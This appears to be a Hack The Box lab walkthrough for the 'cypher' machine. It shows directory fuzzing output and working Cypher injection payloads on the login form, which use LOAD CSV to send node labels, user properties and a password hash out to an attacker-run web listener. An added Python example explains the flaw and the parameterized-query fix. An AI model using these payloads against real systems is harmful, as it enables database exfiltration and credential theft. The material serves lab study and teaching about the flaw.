80

adot@pwndot:~/htb/cypher$ echo 10.10.11.57 cypher.htb | sudo tee -a /etc/hosts
[sudo] password for adot:
10.10.11.57 cypher.htb
http://cypher.htb/
adot@pwndot:~/htb/cypher$ ffuf -w ~/opt/wordlists/directory-list-2.3-medium.txt -u http://cypher.htb/FUZZ -e html -t 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cypher.htb/FUZZ
 :: Wordlist         : FUZZ: /home/adot/opt/wordlists/directory-list-2.3-medium.txt
 :: Extensions       : html
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

about                   [Status: 200, Size: 4986, Words: 1117, Lines: 179, Duration: 48ms]
login                   [Status: 200, Size: 3671, Words: 863, Lines: 127, Duration: 50ms]
index                   [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 51ms]
                        [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 55ms]
demo                    [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 52ms]
api                     [Status: 307, Size: 0, Words: 1, Lines: 1, Duration: 54ms]
testing                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 50ms]
                        [Status: 200, Size: 4562, Words: 1285, Lines: 163, Duration: 46ms]
:: Progress: [441096/441096] :: Job [1/1] :: 4201 req/sec :: Duration: [0:01:44] :: Errors: 0 ::
http://cypher.htb/testing/
http://cypher.htb/login

Add a '

Was able to bypass the authentication query, but not completely, because app.py verifies the hash

adot@pwndot:~/htb/cypher/cyphermap$ echo Adot > test.txt

adot@pwndot:~/htb/cypher/cyphermap$ updog -p 80

' OR 1=1 LOAD CSV FROM 'http://10.10.14.18/test.txt' AS x LOAD CSV FROM 'http://10.10.14.18/'+x[0] AS y RETURN ''//

Tables (node labels, listed with db.labels())

' OR 1=1 WITH 1337 AS x CALL db.labels() YIELD label AS d LOAD CSV FROM 'http://10.10.14.18/'+d AS y RETURN y//

' OR 1=1 WITH 1 as a MATCH (u:USER) UNWIND keys(u) as p LOAD CSV FROM 'http://10.10.14.18:80/?' + p +'='+toString(u[p]) as l RETURN 0 as _0 //

graphasm

' OR 1=1 WITH 1 as a MATCH (f:SHA1) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.14.18:80/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //

9f54ca4c130be6d529a56dee59dc2b2090e43acf

Can't crack the hash
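
Why the single quote and the payloads above take effect, and what the fix looks like, as an added example (not code from the box or from these notes): it compares the clause structure of a string-built login query against a parameterized one. The query shape and the `name` property are assumptions, since app.py's real query is not shown here; only the USER label and the payload come from the page.

```python
import re

# Assumed query shape: the notes never show app.py's query. Only the USER label
# comes from the page; the property name is hypothetical.
VULN_TEMPLATE = "MATCH (u:USER) WHERE u.name = '{name}' RETURN u"
SAFE_QUERY = "MATCH (u:USER) WHERE u.name = $name RETURN u"

CLAUSE = re.compile(r"\b(LOAD\s+CSV|MATCH|WHERE|WITH|UNWIND|CALL|YIELD|RETURN|OR|AND)\b", re.I)

def strip_literals(query):
    """Drop quoted strings and // comments, leaving only the query structure."""
    out, i, quote = [], 0, None
    while i < len(query):
        ch = query[i]
        if quote:
            if ch == "\\":          # skip an escaped character inside a literal
                i += 2
                continue
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
        elif query.startswith("//", i):
            end = query.find("\n", i)
            i = len(query) if end < 0 else end
            continue
        else:
            out.append(ch)
        i += 1
    return "".join(out)

def clauses(query):
    """Ordered clause keywords that sit outside string literals and comments."""
    return [" ".join(k.upper().split()) for k in CLAUSE.findall(strip_literals(query))]

def build_vulnerable(name):
    return VULN_TEMPLATE.format(name=name)      # input becomes query text

def build_safe(name):
    return SAFE_QUERY, {"name": name}           # input travels as a parameter

def changes_structure(name):
    """True when the input alters the clause list of the concatenated query."""
    return clauses(build_vulnerable(name)) != clauses(build_vulnerable("x"))

# First payload from the notes above, used unchanged as test input.
PAGE_PAYLOAD = ("' OR 1=1 LOAD CSV FROM 'http://10.10.14.18/test.txt' AS x "
                "LOAD CSV FROM 'http://10.10.14.18/'+x[0] AS y RETURN ''//")
```

With the parameterized form the query text is identical for every input, so a `LOAD CSV` clause can only appear if the developer wrote it; the same clause comparison can be used as a server-side check on any query that is still built by concatenation.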
